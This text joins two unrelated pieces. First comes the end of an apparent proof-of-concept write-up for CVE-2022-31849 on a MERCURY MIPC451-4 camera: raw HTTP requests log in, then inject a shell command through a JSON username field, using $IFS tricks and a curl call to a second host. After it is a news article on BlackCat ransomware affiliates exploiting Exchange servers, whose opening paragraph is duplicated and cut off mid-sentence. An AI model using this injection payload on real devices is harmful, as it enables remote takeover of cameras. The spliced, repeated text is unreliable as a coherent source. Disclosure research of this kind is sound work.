        Origin: http://192.168.0.103
        Connection: close
        Referer: http://192.168.0.103/
        
        {"method":"do","login":{"username":"{your_name}","password":"{your_password}"}}
        
    
2.  Trigger remote command execution
    
    > Command:curl$IFS-o-$IFS'http://192.168.0.101:9999/skye231'
    
        POST /stok=05173d0162e8c77387fa1bbc12b2fa62/ds HTTP/1.1
        Host: 192.168.0.103
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 147
        Origin: http://192.168.0.103
        Connection: close
        Referer: http://192.168.0.103/
        
        {"cloud_config":{"bind":{"username":"\"}';curl$IFS-o-$IFS'http://192.168.0.101:9999/skye231';'{\"@mrskye.com","password":"admin123"}},"method":"do"}

CVE-2022-31849: Vuln/MERCURY_MIPC451-4/command_execution_0 at master · skyedai910/Vuln

Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for unpatched Exchange server vulnerabilities to gain access to targeted networks.
Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, followed by carrying out credential theft and lateral movement activities, before harvesting intellectual property and

Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for unpatched Exchange server vulnerabilities to gain access to targeted networks.

Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, carrying out credential theft and lateral movement activities, before harvesting intellectual property and dropping the ransomware payload.

The entire sequence of events played out over the course of two full weeks, the Microsoft 365 Defender Threat Intelligence Team said in a report published this week.

"In another incident we observed, we found that a ransomware affiliate gained initial access to the environment via an internet-facing Remote Desktop server using compromised credentials to sign in," the researchers said, pointing out how "no two BlackCat 'lives' or deployments might look the same."

BlackCat, also known by the names ALPHV and Noberus, is a relatively new entrant to the hyperactive ransomware space. It's also known to be one of the first cross-platform ransomware written in Rust, exemplifying a trend where threat actors are switching to uncommon programming languages in an attempt to evade detection.

The ransomware-as-a-service (RaaS) scheme, irrespective of the varying initial access vectors employed, culminates in the exfiltration and encryption of target data that's then held ransom as part of what's called double extortion.

The RaaS model has proven to be a lucrative gig economy-style cybercriminal ecosystem consisting of three different key players: access brokers (IABs), who compromise networks and maintain persistence; operators, who develop and maintain the ransomware operations; and affiliates, who purchase the access from IABs to deploy the actual payload.

According to an alert released by the U.S. Federal Bureau of Investigation (FBI), BlackCat ransomware attacks have victimized at least 60 entities worldwide as of March 2022 since it was first spotted in November 2021.

Furthermore, Microsoft said that "two of the most prolific" affiliate threat groups, which have been associated with several ransomware families such as Hive, Conti, REvil, and LockBit 2.0, are now distributing BlackCat.

This includes DEV-0237 (aka FIN12), a financially motivated threat actor that was last seen targeting the healthcare sector in October 2021, and DEV-0504, which has been active since 2020 and has a pattern of shifting payloads when a RaaS program shuts down.

"DEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022," Microsoft noted last month. "Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel